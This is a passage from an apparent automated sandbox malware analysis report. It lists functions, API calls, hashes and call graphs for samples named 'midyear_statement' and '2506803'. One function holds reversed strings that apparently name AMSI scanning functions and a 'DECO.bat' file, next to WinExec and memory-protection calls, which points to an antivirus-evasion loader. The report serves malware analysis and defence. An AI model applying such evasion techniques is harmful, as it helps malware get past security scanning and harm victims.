                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                          • API String ID: 1646373207-3712701948
                                                                                                                                                                                          • Opcode ID: 44a582252ca00d8e01e461a5aeb1ee7646b9f32ba32bae6a845bbef84743e9ab
                                                                                                                                                                                          • Instruction ID: 0bf295593f0d2dc1b4f53e01180158fde6d395170f25c9f0764c92ad26cef674
                                                                                                                                                                                          • Opcode Fuzzy Hash: 44a582252ca00d8e01e461a5aeb1ee7646b9f32ba32bae6a845bbef84743e9ab
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2D09EB1A48301DBF7206FF5E88472635D8D718218F458835E506FA100D6BEA8684F98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040AE12C Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 040AE1DB
                                                                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 040AE1F7
                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 040AE26E
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 040AE297
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 920484758-0
                                                                                                                                                                                          • Opcode ID: 7aff93a85f7897af4e013826a23d0fd18c76a7c1603c971e34bc348078debbbc
                                                                                                                                                                                          • Instruction ID: 986ceaa9716d0d1a115db46497fcc9a628e71327bd0353b67d6893577fee83d9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7aff93a85f7897af4e013826a23d0fd18c76a7c1603c971e34bc348078debbbc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C41F7B5A412299FDB61DF98CC94BC9B3FDAF49308F0042D5E649A7211DA30BF908F90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040AAC80 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 040AAC9D
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 040AACC1
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(040A0000,?,00000105), ref: 040AACDC
                                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 040AAD72
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3990497365-0
                                                                                                                                                                                          • Opcode ID: 2a08b05769bd4ae081920d513ff9f207de81f93745a9aa2d4593b0826f90b4bc
                                                                                                                                                                                          • Instruction ID: dd23ddbad80aef912d8ad8436d9207c7a7530a26e26ea33250906900f531dce9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a08b05769bd4ae081920d513ff9f207de81f93745a9aa2d4593b0826f90b4bc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 21413071A002589BEB61DFA8CC84BDAB7F8AB18308F0440E5A548F7291D7B5AF94CF50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040AAC7E Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 040AAC9D
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 040AACC1
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(040A0000,?,00000105), ref: 040AACDC
                                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 040AAD72
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3990497365-0
                                                                                                                                                                                          • Opcode ID: 3a11e62541d36c545c66c501bcb48c8268746754cfc04c33e66829e85f1defa6
                                                                                                                                                                                          • Instruction ID: 97485225dd137b54f2f75bd516342e2b228fe96eca9195b6cfb5c13ec23fef1d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a11e62541d36c545c66c501bcb48c8268746754cfc04c33e66829e85f1defa6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B415371A002589BEB61DBA8CC84BDAB7FCAB18308F0440E5A548F7291D7B5BF94CF50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: dab1cbe13cac4fb33e3239648d7e79b5c3ff788611e248b7fc3451f4619a14ae
                                                                                                                                                                                          • Instruction ID: 9bf8433f627389c0b11d0779f780cf949187eef61bac3a8c5154bd3d3f673d7a
                                                                                                                                                                                          • Opcode Fuzzy Hash: dab1cbe13cac4fb33e3239648d7e79b5c3ff788611e248b7fc3451f4619a14ae
                                                                                                                                                                                          • Instruction Fuzzy Hash: 94A1D4767106104BE718EAFC9C843EDB3D5DBC4369F18427EE115EF381EB68E9628290
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A9430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,040A951E), ref: 040A94B6
                                                                                                                                                                                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,040A951E), ref: 040A94BC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DateFormatLocaleThread
                                                                                                                                                                                          • String ID: yyyy
                                                                                                                                                                                          • API String ID: 3303714858-3145165042
                                                                                                                                                                                          • Opcode ID: 3fb50975a63c28689453fc9abf89faae6d179c34addeef8589135468415edca8
                                                                                                                                                                                          • Instruction ID: 085d3aff849be4bca6a52e9ac56944b50355b727cdfb0ed2df45b7f275ba45df
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fb50975a63c28689453fc9abf89faae6d179c34addeef8589135468415edca8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 672151B5A001189FEB14EFE8C841AEEB7F8EF48708F5148A5E944F7650D770BE608B61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040B9F3C Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 040B9F70
                                                                                                                                                                                          • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 040B9FA0
                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000008), ref: 040B9FBF
                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 040B9FCB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Read$Write
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3448952669-0
                                                                                                                                                                                          • Opcode ID: 946895becdb6801529fb54b334e6d0e3e237b3b738d6d3b284648f9b58eaed70
                                                                                                                                                                                          • Instruction ID: a6233d1ab349bdb5cda26fb7b6ca2b0f3e20d1f2a745a168b857bc745ca9cfcb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 946895becdb6801529fb54b334e6d0e3e237b3b738d6d3b284648f9b58eaed70
                                                                                                                                                                                          • Instruction Fuzzy Hash: B721B4B164021A9BDF10CF68CC80BEEB3A8EF44364F048511FE94A7345D734F81196E8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:15.8%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:2.8%
                                                                                                                                                                                          Total number of Nodes:144
                                                                                                                                                                                          Total number of Limit Nodes:2
                                                                                                                                                                                          execution_graph 862 7ff790089b20 865 7ff790089e54 862->865 866 7ff790089b29 865->866 867 7ff790089e80 6 API calls 865->867 867->866 744 613c1290 745 613c12af 744->745 746 613c12f0 744->746 748 613c1d20 6 API calls 745->748 754 613c12d6 745->754 771 613c1d20 746->771 750 613c12be 748->750 749 613c12f5 749->750 751 613c1305 749->751 752 613c1aed 3 API calls 750->752 791 613c1050 751->791 755 613c12cb 752->755 755->754 759 613c1050 2 API calls 755->759 756 613c130a 756->754 757 613c1370 756->757 758 613c1353 756->758 760 613c1375 757->760 761 613c13c0 757->761 758->754 762 613c1050 2 API calls 758->762 759->754 797 613c20c0 760->797 763 613c1aed 3 API calls 761->763 762->754 763->755 765 613c137a 802 613c1aed 765->802 768 613c1aed 3 API calls 769 613c13a1 768->769 770 613c1050 2 API calls 769->770 770->755 774 613c1d50 771->774 790 613c1d3b 771->790 772 613c1f00 776 613c1f09 772->776 772->790 773 613c1dec 777 613c1f71 773->777 779 613c1f3d 773->779 782 613c1e44 773->782 783 613c1fa6 773->783 773->790 774->772 774->773 774->790 775 613c1bb0 4 API calls 775->776 776->775 778 613c1f38 776->778 781 613c1bb0 4 API calls 777->781 780 613c1e74 778->780 779->783 785 613c1bb0 4 API calls 779->785 788 613c1ec3 VirtualQuery 780->788 780->790 781->783 782->773 782->780 782->783 806 613c1bb0 782->806 784 613c1bb0 4 API calls 783->784 786 613c1fe9 784->786 785->777 786->790 789 613c1edc VirtualProtect 788->789 788->790 789->780 790->749 792 613c1066 791->792 793 613c10e0 791->793 794 613c1094 Sleep 792->794 796 613c10a8 792->796 795 613c1119 Sleep 793->795 793->796 794->792 795->793 796->756 798 613c20ca 797->798 799 613c2060 797->799 798->765 815 613c27d0 799->815 803 613c1b06 802->803 804 613c138a 802->804 822 613c192b 803->822 804->754 804->768 807 613c1be2 806->807 808 613c1c43 VirtualQuery 807->808 811 613c1ce5 807->811 809 613c1c71 memcpy 808->809 808->811 812 613c1d3b 811->812 813 613c1ec3 VirtualQuery 811->813 812->782 813->812 814 613c1edc VirtualProtect 813->814 814->811 817 613c27e4 815->817 816 613c2865 816->765 817->816 820 613c2f48 __dllonexit 817->820 821 613ca2e4 820->821 823 613c194d 822->823 845 613c1861 LoadLibraryW 823->845 826 613c1861 LoadLibraryW 827 613c19eb 826->827 828 613c1861 LoadLibraryW 827->828 829 613c19fb 828->829 830 613c1861 LoadLibraryW 829->830 831 613c1a0b 830->831 832 613c1861 LoadLibraryW 831->832 833 613c1a1b 832->833 834 613c1861 LoadLibraryW 833->834 835 613c1a99 WinExec 834->835 836 613c1861 LoadLibraryW 835->836 837 613c1abe 836->837 838 613c1861 LoadLibraryW 837->838 839 613c1ace 838->839 840 613c1861 LoadLibraryW 839->840 841 613c1ade ExitProcess 840->841 843 613c1aed 841->843 842 613c1b10 842->804 843->842 844 613c192b LoadLibraryW 843->844 844->842 846 613c188b 845->846 846->826 847 613c13e0 848 613c13f6 847->848 853 613c20e0 848->853 850 613c1413 857 613c2470 850->857 854 613c2109 853->854 855 613c2120 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 853->855 854->850 856 613c217d 855->856 856->850 859 613c247f 857->859 858 613c1418 859->858 860 613c2540 RtlAddFunctionTable 859->860 860->858 868 613c2720 869 613c2728 868->869 871 613c272d 869->871 873 613c2de0 869->873 872 613c2745 874 613c2de9 873->874 875 613c2e32 873->875 878 613c2e04 874->878 881 613c2deb 874->881 876 613c2e3c 875->876 877 613c2e50 InitializeCriticalSection 875->877 876->872 877->876 880 613c2c50 3 API calls 878->880 883 613c2e0e 878->883 879 613c2e19 DeleteCriticalSection 884 613c2dfa 879->884 880->883 881->884 885 613c2c50 EnterCriticalSection 881->885 883->879 883->884 884->872 886 613c2ca4 885->886 888 613c2c71 885->888 887 613c2c80 TlsGetValue GetLastError 887->888 888->886 888->887 889 613c2750 890 613c2762 889->890 891 613c2772 890->891 892 613c2de0 5 API calls 890->892 892->891 893 613c21c0 RtlCaptureContext RtlLookupFunctionEntry 894 613c21fd RtlVirtualUnwind 893->894 895 613c22a0 893->895 896 613c2233 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 894->896 895->896 896->895 897 613c2cc0 898 613c2ce0 897->898 900 613c2cd1 897->900 899 613c2cfc EnterCriticalSection LeaveCriticalSection 898->899 898->900 901 613c2d40 902 613c2d4f 901->902 903 613c2d60 EnterCriticalSection 901->903 904 613c2d7b 903->904 905 613c2d97 LeaveCriticalSection 903->905 904->905 907 613c2d81 904->907 906 613c2da4 905->906 908 613c2dc0 LeaveCriticalSection 907->908 908->906 861 613c3031 RtlAddFunctionTable

                                                                                                                                                                                          Callgraph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                                          • Disassembly available
                                                                                                                                                                                          callgraph 0 Function_613D16BF 1 Function_613C2F39 2 Function_00007FF790071334 3 Function_613C2B30 17 Function_613C28A0 3->17 52 Function_613C28E0 3->52 4 Function_613C1430 5 Function_613C1BB0 5->5 16 Function_613C2A20 5->16 35 Function_613C2E80 5->35 45 Function_613C2AF0 5->45 59 Function_613C29D0 5->59 6 Function_613C1B30 7 Function_613C2930 7->17 8 Function_613C3031 9 Function_00007FF790089B20 26 Function_00007FF790089E54 9->26 10 Function_00007FF79007AD9C 11 Function_00007FF790079218 12 Function_00007FF79007AD18 13 Function_613C192B 13->13 19 Function_613C1920 13->19 31 Function_613C1512 13->31 55 Function_613C1861 13->55 14 Function_00007FF7900747A4 15 Function_613C1D20 15->5 15->16 15->35 16->17 18 Function_613C1B20 20 Function_613C2720 53 Function_613C2DE0 20->53 21 Function_613D0021 22 Function_613C15A1 23 Function_00007FF7900792A1 24 Function_00007FF79007BB21 25 Function_613C1B9D 27 Function_613D039A 28 Function_00007FF7900713D4 29 Function_613C2B90 29->17 29->52 30 Function_613C1290 30->15 46 Function_613C1AED 30->46 58 Function_613C1050 30->58 71 Function_613C2EC0 30->71 72 Function_613C20C0 30->72 32 Function_613D0513 33 Function_00007FF7900741C4 34 Function_613C1000 34->6 36 Function_613D0D00 37 Function_613CA27C 38 Function_613D1DFE 39 Function_00007FF79007D6E8 40 Function_00007FF79007B968 41 Function_613D057A 42 Function_00007FF79007E174 43 Function_00007FF7900797F4 44 Function_613C2470 44->7 44->45 54 Function_613C2A60 44->54 45->17 46->13 46->19 47 Function_00007FF790079258 48 Function_00007FF79007A3E4 49 Function_613C13E0 49->44 51 Function_613C20E0 49->51 50 Function_613C2560 74 Function_613C2C40 50->74 61 Function_613C2C50 53->61 54->17 56 Function_00007FF790079260 57 Function_00007FF790079293 58->18 59->17 60 Function_613C27D0 60->6 60->18 67 Function_613C2F48 60->67 62 Function_613C2750 62->53 63 Function_613D1CCD 64 Function_00007FF79007AD7C 65 Function_00007FF7900791FC 66 Function_00007FF79007E27C 68 Function_613C1749 69 Function_613D1E4B 70 Function_00007FF79007AE04 72->60 73 Function_613C21C0 75 Function_613C22C0 75->74 76 Function_613C27C0 77 Function_613C2CC0 78 Function_613C2D40 79 Function_613C28C2 80 Function_00007FF79007D000

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 613C192B Relevance: 33.4, APIs: 2, Strings: 17, Instructions: 109processCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 613C1861: LoadLibraryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,613C19DB), ref: 613C187C
                                                                                                                                                                                          • WinExec.KERNEL32 ref: 613C1AAC
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 613C1AEA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.1294192647.00000000613C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 613C0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000010.00000002.1294169307.00000000613C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294213357.00000000613C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294231544.00000000613C9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294253469.00000000613CA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294272098.00000000613CE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_613c0000_2506803.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExecExitLibraryLoadProcess
                                                                                                                                                                                          • String ID: :C$K\23mets$T\.\$\$cSis$cSis$epOismA$gnirtSna$ismA$mA$mA$niw\$noisseSn$reffuBna$tab.OCED$thgiSeur$ys\ swod
                                                                                                                                                                                          • API String ID: 3018545565-3597500037
                                                                                                                                                                                          • Opcode ID: 46f46fb923760554c8cdad2d512a32108210c746ceaa1b5bcb389bcb2f4d4843
                                                                                                                                                                                          • Instruction ID: 869a93a5f3fef28c2d055c4f4f9ffa1e2d27d3cc544e6791dff0e5bdc2d58e8f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 46f46fb923760554c8cdad2d512a32108210c746ceaa1b5bcb389bcb2f4d4843
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1541E472B11B66DCEF00CBAAE8942DD27B4B785B8CF504429CE4E2BB18EB34C605D351
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 613C2470 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlAddFunctionTable.KERNEL32 ref: 613C254A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.1294192647.00000000613C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 613C0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000010.00000002.1294169307.00000000613C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294213357.00000000613C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294231544.00000000613C9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294253469.00000000613CA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294272098.00000000613CE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_613c0000_2506803.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                          • String ID: .pdata
                                                                                                                                                                                          • API String ID: 1252446317-4177594709
                                                                                                                                                                                          • Opcode ID: 6e795cd99005c9a4713801c9161cfb8332b217f622d565cc902d40eb531e0eb9
                                                                                                                                                                                          • Instruction ID: c2e9da794e7722b98bd5b15d45919db4196a2cce8ea7ba1d78af53bbfdc8ed06
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e795cd99005c9a4713801c9161cfb8332b217f622d565cc902d40eb531e0eb9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6921D232712264CBFB058F79DA54394BAA2A788F98F4CD020CE0A57304EB3ACA61C751
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 613C1861 Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 55 613c1861-613c1894 LoadLibraryW 57 613c1915-613c191f 55->57 58 613c1896-613c1911 55->58 58->57
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,613C19DB), ref: 613C187C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000010.00000002.1294192647.00000000613C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 613C0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000010.00000002.1294169307.00000000613C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294213357.00000000613C5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294231544.00000000613C9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294253469.00000000613CA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000010.00000002.1294272098.00000000613CE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_613c0000_2506803.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                          • Opcode ID: 4d4034f170e7b50da01eb1e42fe402126a14cda3a19cef280cafa70307daf033
                                                                                                                                                                                          • Instruction ID: a1738e7a690e1def25e53057858ca31072caabc364c62996bec2843146fe0757
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d4034f170e7b50da01eb1e42fe402126a14cda3a19cef280cafa70307daf033
                                                                                                                                                                                          • Instruction Fuzzy Hash: 51119276B11F248CEB40DBA6E89439D37B5F348B88F144425DE5D67B68EF76C6A08380
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 613C21C0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlCaptureContext.KERNEL32 ref: 613C21D4
                                                                                                                                                                                          • RtlLookupFunctionEntry.KERNEL32 ref: 613C21EB
                                                                                                                                                                                          • RtlVirtualUnwind.KERNEL32 ref: 613C222D
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 613C2274
                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32 ref: 613C2281
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 613C2287
                                                                                                                                                                                          • TerminateProcess.KERNEL32 ref: 613C2295
                                                                                                                                                                                          Memory Dump Source
